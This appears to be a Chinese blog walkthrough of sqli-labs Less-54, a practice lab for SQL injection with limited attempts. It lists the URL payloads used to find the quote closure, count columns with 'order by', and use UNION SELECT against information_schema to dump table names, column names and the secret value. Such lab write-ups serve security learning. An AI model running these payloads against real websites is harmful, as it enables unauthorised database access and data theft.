当前位置:网站首页>SQL注入 Less54(限制次数的SQL注入+union注入)
SQL注入 Less54(限制次数的SQL注入+union注入)
2022-07-31 22:34:00 【华为云】
限制次数的SQL注入
每次reset,数据库的表名、字段名和数据都会发生改变
?id=1
?id=1'
发现没有报错信息
?id=1"
回显正常,直接排查双引号开头的闭合方式
?id=1'--+
?id=1')--+
?id=1'))--+
单引号回显正常,所以是单引号闭合
?id=1' order by 3--+
回显正常?id=1' order by 4--+
回显错误
所以有三列
?id=-1' union select 1,version(),database()--+
?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())--+
?id=-1' union select 1,2,(select group_concat(column_name) from information_schema.columns where table_schema="challenges" and table_name="470aojlrx1")--+
?id=-1' union select 1,2,(select group_concat(id,sessid,secret_KJU8,tryy) from 470aojlrx1)--+
边栏推荐
- Qualcomm cDSP simple programming example (to query Qualcomm cDSP usage, signature), RK3588 npu usage query
- LeetCode 第 304 场周赛
- Daily practice——Randomly generate an integer between 1-100 and see how many times you can guess.Requirements: The number of guesses cannot exceed 7 times, and after each guess, it will prompt "bigger"
- Socket Review and I/0 Model
- Quick Start Tutorial for flyway
- 【ACM】2022.7.31训练赛
- Flink_CDC construction and simple use
- "SDOI2016" Journey Problem Solution
- Implementation of a sequence table
- [Intensive reading of the paper] iNeRF
猜你喜欢
Financial profitability and solvency indicators
Bionic caterpillar robot source code
Count characters in UTF-8 string function
How to identify fake reptiles?
网易云信圈组上线实时互动频道,「破冰」弱关系社交
The difference between adding or not adding the ref keyword when a variable of reference type is used as a parameter in a method call in C#
Efficient Concurrency: A Detailed Explanation of Synchornized's Lock Optimization
Recognize anomalies (you will understand after reading this)
20. Support vector machine - knowledge of mathematical principles
focus on!Haitai Fangyuan joins the "Personal Information Protection Self-discipline Convention"
随机推荐
Efficient Concurrency: A Detailed Explanation of Synchornized's Lock Optimization
GateWay implements load balancing
顺序表的实现
Embedded development has no passion, is it normal?
Summary of the classic drawing method of histogram
无状态与有状态的区别
Write a database document management tool based on WPF repeating the wheel (1)
[QNX Hypervisor 2.2用户手册]9.15 suppress
Istio introduction
One thing to say, is outsourcing company worth it?
In Golang go-redis cluster mode, new connections are constantly created, and the problem of decreased efficiency is solved
嵌入式开发没有激情了,正常吗?
Several methods for deleting specified elements in Golang slices
Realization of character makeup
Document management and tools in the development process
HTC using official firmware as bottom bag made ROM brush card bag tutorial
Niuke.com brush questions (1)
ThreadLocal
AI automatic code writing plugin Copilot (co-pilot)
Flex layout in detail